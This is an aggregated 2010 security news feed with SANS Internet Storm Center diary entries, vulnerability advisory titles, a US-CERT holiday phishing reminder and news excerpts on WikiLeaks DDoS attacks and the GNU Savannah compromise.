InfoSec News

So as its my first shift as handler of the day I was worried if I would be able to live up to the bar the handlers have set in diaries and days past. This started a train of thought that was accelerated by Robert RSnake Hansens 1000th and final post on http://ha.ckers.org today. I am sure that everyone reading this is aware of whom Robert is but in case you have been under a rock for the last many years or just not involved in web application security. Robert is one of the giants upon whose shoulders we all stand. Robert has helped cause XSS, SQLi and XSRF to become terms that the business people we deal with understand. He has also fostered an environment where people share tips and tricks and encourage each other to become better.

In his last blog post on the site, Robert discusses how he needs to follow his happiness and that this is the main reason he is stepping out of the limelight. (Yes this blog post does continue the light shining on him a bit but I think its ok this once.) He brings up a point that is one that I have discussed with many people. What happens when this isnt fun anymore? While I am sure that rooting boxes and yanking data through a web application will cause me to giggle for years into the future, how do we ensure that the people we have manage and monitor our security are still enjoying what they do?

Its also funny that this comes up at the same time that the mainstream news outlets are discussing the use of the history browsing attacks using JavaScript and CSS. This is an attack we have discussed for a long while now, but since its been found in the wild being used by advertising and adult sites, maybe we will see some more movement on fixing it.

Thoughts?

Kevin Johnson
Secure Ideas
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
The U.S. General Services Administration will become the first federal agency to use a hosted e-mail service, choosing Google, Unisys and others to offer the service.
 
Verizon Wireless is undercutting its own 3G plans with pricing for the LTE network scheduled to go live on Sunday, possibly marking the beginning of a fight to capture high-speed wireless subscribers.
 
With the ink still damp on the Small Business Jobs Act of 2010, small business owners are already feeling more confident as this difficult year draws to a close.
 
SAP's High-Performance Analytic Appliance, or HANA, which started shipping on Wednesday, should give its customers a much faster, more flexible way to analyze large volumes of data in real-time, analysts said.
 
Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
 
The freshly Microsoft-funded TurboHercules offers an emulator to run IBM mainframe OSes on x86 servers
 
Tablets will slowly gain acceptance in the enterprise, and in the long term could possibly could replace laptops as a primary computing device, a Dell executive said this week.
 
The traditional port-based enterprise firewall, now looking less like a guard and more like a pit stop for Internet applications racing in through the often open ports 80 and 443, is slowly losing out to a new generation of brawny, fast, intelligent firewalls.
 
Verizon Wednesday laid down some important markers that AT&T and T-Mobile will try to match or best when they launch their own LTE networks next year
 
Every year, I try to predict the top trends in security for the upcoming year. To give myself a sense of accountability I always look back at how well those predictions worked out and either abandon them or double-down for the next year! It's time to test my annual security predictions for 2010.
 
Perl CGI.pm 'multipart/x-mixed-replace' MIME Boundary HTTP Response Splitting Vulnerability
 
OpenJDK 'IcedTea' plugin (CVE-2010-3860) Unspecified Information Disclosure Vulnerability
 

GovInfoSecurity.com

Fed Infosec Spending Seen Rising By 9% a Year
GovInfoSecurity.com
The federal government will spend $13.3 billion on cybersecurity wares from vendors by 2015, an annual growth topping 9 percent over the next five years, ...

and more »
 
ISC BIND Key Algorithm Rollover Security Vulnerability
 
ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
 
Less than a week after they released software that unlocked Windows Phone 7 (WP7) smartphones to let users install unauthorized applications, three developers have yanked the tool from distribution.
 
Amazon has pulled the plug on WikiLeaks, the site that earlier this week began releasing a mammoth collection of confidential U.S. State Department diplomatic cables.
 
After months of delays, Google will launch its e-book retail business, called Google Editions, in the U.S. before the end of the year, a Google spokesman confirmed.
 
Searches on the oil spill the Gulf of Mexico, the World Cup, teenage pop star Miley Cyrus and Lady Gaga made Yahoo's top 10 list of most popular online searches.
 
[SECURITY] [DSA-2129-1] New krb5 packages fix checksum verification weakness
 
[SECURITY] [DSA-2128-1] New libxml2 packages fix potential code execution
 
With the USholiday season quickly approaching and the excitement being generated with topics like WikiLeaks and change to the USGovernment soon to take place (new Speaker of the House, etc) I felt it might be a good time to gently remind our readers not to click too quick.Every year around this time we start seeing a barrage of emails trying to trick unsuspecting recipients into getting the latest gossip or viewing that e-greeting card and the next thing we know we have a whole bunch of new spam zombies or other backdoor trojans out clogging up the works. USCert has issued a reminder to this affect with some really good advise on what to watch out for and things you need to know to protect your computer. So proceed with caution but have lots of fun.
Thanks to Sean for providing this information from US Cert.
Holiday Season Phishing Scams and Malware Campaigns
added November 18, 2010 at 02:17 pm


In the past, US-CERT has received reports of an increased number of phishing scams and malware campaigns that take advantage of the winter holiday and holiday shopping season. US-CERT reminds users to remain cautious when receiving unsolicited email messages that could be part of a potential phishing scam or malware campaign.



These phishing scams and malware campaigns may include but are not limited to the following:




electronic greeting cards that may contain malware
requests for charitable contributions that may be phishing scams and may originate from illegitimate sources claiming to be charities
screensavers or other forms of media that may contain malware
credit card applications that may be phishing scams or identity theft attempts
online shopping advertisements that may be phishing scams or identity theft attempts from bogus retailers


US-CERT encourages users and administrators to use caution when encountering these types of email messages and take the following preventative measures to protect themselves from phishing scams and malware campaigns:




Do not follow unsolicited web links in email messages.
Use caution when opening email attachments. Refer to the Using Caution with Email Attachments Cyber Security Tip for more information on safely handling email attachments.
Maintain up-to-date antivirus software.
Review the Federal Trade Commission's Charity Checklist.
Verify charity authenticity through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.
Refer to the Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
Refer to the Avoiding Social Engineering and Phishing Attacks Cyber Security Tip for more information on social engineering attacks.
Refer to the Shopping Safely Online Cyber Security Tip for more information on online shopping safety.



Deb Hale Long Lines, LLC (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Globe and Mail

Amazon.com Drops Wikileaks
ReadWriteWeb
The security blog Infosec Island has conducted interviews with him about his methods and motivations. On Sunday, The Jester tweeted "If I was a wikileaks ...
WikiLeaks Hit By Another Massive DDoS Hacker AttackFast Company
Lone hacker theory in Wikileaks DDoS attackRegister

all 1,098 news articles »
 
The FTC endorses a national do-not-track list to protect consumers online.
 
Verizon Wireless will launch its faster Long Term Evolution (LTE) wireless network in 38 cities on Sunday, with an initial focus on business users who deploy LTE over new $100 USB modems connected to laptops.
 
Take a look back at the pros and cons of life before HDTV, Facebook and Wi-Fi. You do remember life before texting, don't you?
 
[USN-1025-1] Bind vulnerabilities
 
Vulnerabilities in Fabrica Engine
 
Razer, the guys who make all sorts of crazy game-logo-festooned computer peripherals, were kind enough to send over a minor trove of StarCraft II kit to evaluate. More, in fact, than I asked for, including an official StarCraft II Zerg Edition Messenger Bag. Did you know there's an official StarCraft II bag? Neither did I.
 
Apple's iPhone and Research in Motion's BlackBerry are in a dead heat for U.S. smartphone ownership honors, Nielsen said today.
 
Holiday shoppers on Cyber Monday spent more than $1 billion online, a new record, according to a report from ComScore, an online research firm.
 
Verizon Wireless on Wednesday said its wireless high speed LTE (Long Term Evolution) network will become available in 38 cities on Dec. 5.
 
The GNU repository was compromised by a SQL Injection attack last week.
 
D-Link DIR-300 'tools_admin.php' Security Bypass Vulnerability
 
The FCC's chairman outlines a proposal on net neutrality and pushes for a vote Dec. 21.
 
Verizon Wireless on Wednesday said its wireless high speed LTE (Long Term Evolution) network will become available in 38 cities on Dec. 5.
 
McAfee VirusScan Enterprise 'traceapp.dll' DLL Loading Arbitrary Code Execution Vulnerability
 
Re: D-Link DIR-300 authentication bypass
 
Dell today resumed selling its Venue Pro smartphone, three weeks after halting sales over concerns about problematic Wi-Fi connections and mislabeled batteries.
 
Apple's app removal processes have always been a little blurry, but over the Thanksgiving holiday, the company made one point clear: The App Store is no place for homophobia.
 
AirPlay, one of the main feature additions in iOS 4.2, could soon work with third-party apps and Safari, according to a purported Steve Jobs e-mail that a reader sent to the MacRumors blog. The e-mail suggests that in 2011 users will be able to stream video to their Apple TVs from third-party applications and the Safari browser.
 
The Sonatype Professional suite is built for Java developers and helps minimize bugs while maximizing software reuse
 
Digitalus 1.10.0 Alpha2 Arbitrary File Upload vulnerability.txt
 
Secunia Research: Winamp NSV Table of Contents Parsing Integer Overflow
 
[eVuln.com] Multiple XSS in Alguest
 
Cisco plans to acquire Linsider for its engineers, rapid provisioning tools
 
The FCC is scheduled to vote on net neutrality rules during its Dec. 21 meeting.
 
Microsoft's Internet Explorer browser again lost usage share last month to rivals Google and Apple, posting its largest decline since March, a Web analytics firm said.
 
[ MDVSA-2010:246 ] krb5
 
[ MDVSA-2010:245 ] krb5
 
CORE-2010-1109 - Multiple vulnerabilities in BugTracker.Net
 
A vulnerability in the ESX 4.1 hypervisor could enable a local attacker to gain additional privileges.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
McAfee Released Security Bulletin SB10013 this morning. The bulletin pertains to a potential code execution vulnerability for VirusScan Enterprise 8.5i and earlier versions. According to the information from McAfee they are investigating the publicly disclosed security issue and will publish a hotfix as soon as the investigation is complete. They have listed his as a Severity Rating of Medium.For more information and to check for the hotfix keep an eye on kc.mcafee.com/corporate/index.
Deb Hale Long Lines, LLC (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Interpol has issued a so-called "red notice" for Wikileaks' Julian Assange, notifying police around the world that he is wanted for questioning by Swedish prosecutors related to sexual assault accusations.
 
Apple has been awarded a patent for a display system that would allow multiple viewers to see a high-quality 3D image projected on a screen without the need for special glasses, regardless of where they are sitting.
 
Groupon, the Internet deal site that Google reportedly plans to buy for $5 billion, expanded in Asia by buying three websites in the region for an undisclosed sum.
 
The FCC is scheduled to vote on net neutrality rules during its Dec. 21 meeting.
 
Microsoft's Internet Explorer browser again lost usage share last month to rivals Google and Apple, posting its largest decline since March, a Web analytics firm said.
 
Another day, another quarter of a million confidential government documents released via WikiLeaks.
 
If you provide or allow employees an iPad, here are the productivity apps that you should install on them
 
Is your iPad acting up? Our tips can help fix frozen screens, syncing problems, Wi-Fi woes and more -- or just improve your iPad experience.
 
MIT Kerberos 5 Key Distribution Center 'KrbFastReq' Forgery Security Bypass Vulnerability
 
Nobel Prize winner and U.S. Secretary of Energy Steven Chu Tuesday bluntly warned that the U.S. is in danger of losing its leadership in the development and export of high technology products.
 
ArtistScope Link Protect Multiple HTML Injection Vulnerabilities
 
HP Data Protector Manager Remote Denial of Service Vulnerability
 
InfoSec News: 'Hacktivist' takes credit for WikiLeaks attacks via Twitter: http://latimesblogs.latimes.com/technology/2010/11/hacktivist-takes-credit-for-wikileaks-attacks-via-twitter.html
By Nathan Olivarez-Giles Los Angeles Times November 30, 2010
A self-proclaimed "hacktivist" is apparently taking some credit for the Internet attacks that shut down many pages on WikiLeaks.org today.
The hacker, who goes by the name Jester, claims on his blog to have used distributed denial of service attacks to bring down websites in the past Jester often claims responsibility for bringing down websites on his Twitter account using the phrase "tango down," which is used by the military to indicate that an enemy has been eliminated in a firefight.
Today, he sent multiple tweets directed at WikiLeaks:
[...]
 
InfoSec News: FDIC's IT Systems at Elevated Risk: http://www.govinfosecurity.com/articles.php?art_id=3138
Gov Info Security November 30, 2010
The Federal Deposit Insurance Corp. has worked hard to implement IT security procedures to safeguard its financial systems, but despite those efforts, the FDIC faces an elevated risk of the misuse of federal assets.
That's according to Tuesday's Government Accountability Office report, Federal Deposit Insurance Corporation Needs to Mitigate Control Weaknesses, that also cited unauthorized modification or destruction of financial information, inappropriate disclosure of other sensitive information and disruption of critical operations that put the FDIC systems at risk.
FDIC also failed to implement sufficiently access and other controls intended to protect the confidentiality, integrity and availability of its financial systems and information. For example, GAO said, the FDIC didn't always:
[...]
 
InfoSec News: Analyst finds flaws in Canon image verification system: http://www.networkworld.com/news/2010/113010-analyst-finds-flaws-in-canon.html
By Jeremy Kirk IDG News Service November 30, 2010
A cryptographic system used by Canon to ensure that digital images haven't been altered is flawed and can't be fixed, according to a [...]
 
InfoSec News: WikiLeaks Missives Contain Many Tech Secrets: http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=228400240
By J. Nicholas Hoover InformationWeek November 30, 2010
The cache of more than 250,000 sensitive diplomatic cables acquired by WikiLeaks, only a fraction of which have been released, appear to [...]
 
InfoSec News: Free software repository brought down in hack attack: http://www.theregister.co.uk/2010/12/01/gnu_savannah_hacked/
By Dan Goodin in San Francisco The Register 1st December 2010
The main source-code repository for the Free Software Foundation has been taken down following an attack that compromised some of the [...]
 
Nvidia and Intel together asked a Delaware court to postpone the start of a trial between the two chip makers until next year as they continue to seek a settlement, Nvidia's CEO said Wednesday. The trial had been scheduled for Dec. 6.
 
As part of a new push to weed out piracy in the country, China will inspect central and local government computers to ensure all the departments are using copyrighted software.
 

Posted by InfoSec News on Nov 30

http://latimesblogs.latimes.com/technology/2010/11/hacktivist-takes-credit-for-wikileaks-attacks-via-twitter.html

By Nathan Olivarez-Giles
Los Angeles Times
November 30, 2010

A self-proclaimed "hacktivist" is apparently taking some credit for the
Internet attacks that shut down many pages on WikiLeaks.org today.

The hacker, who goes by the name Jester, claims on his blog to have used
distributed denial of service attacks to bring...
 

Posted by InfoSec News on Nov 30

http://www.govinfosecurity.com/articles.php?art_id=3138

Gov Info Security
November 30, 2010

The Federal Deposit Insurance Corp. has worked hard to implement IT
security procedures to safeguard its financial systems, but despite
those efforts, the FDIC faces an elevated risk of the misuse of federal
assets.

That's according to Tuesday's Government Accountability Office report,
Federal Deposit Insurance Corporation Needs to Mitigate Control...
 

Posted by InfoSec News on Nov 30

http://www.networkworld.com/news/2010/113010-analyst-finds-flaws-in-canon.html

By Jeremy Kirk
IDG News Service
November 30, 2010

A cryptographic system used by Canon to ensure that digital images
haven't been altered is flawed and can't be fixed, according to a
Russian security company that specializes in encryption.

Mid- to high-end Canon digital cameras have a feature called "Original
Decision Data" (ODD), which is a digital...
 

Posted by InfoSec News on Nov 30

http://www.informationweek.com/news/government/security/showArticle.jhtml?articleID=228400240

By J. Nicholas Hoover
InformationWeek
November 30, 2010

The cache of more than 250,000 sensitive diplomatic cables acquired by
WikiLeaks, only a fraction of which have been released, appear to
contain many details on the technology and Internet policies,
cybersecurity practices, and IT systems of the U.S. government and other
countries....
 

Posted by InfoSec News on Nov 30

http://www.theregister.co.uk/2010/12/01/gnu_savannah_hacked/

By Dan Goodin in San Francisco
The Register
1st December 2010

The main source-code repository for the Free Software Foundation has
been taken down following an attack that compromised some of the
website's account passwords and may have gained unfettered
administrative access.

The SQL-injection attacks on GNU Savannah exploited holes in Savane, the
open-source software hosting...
 


Internet Storm Center Infocon Status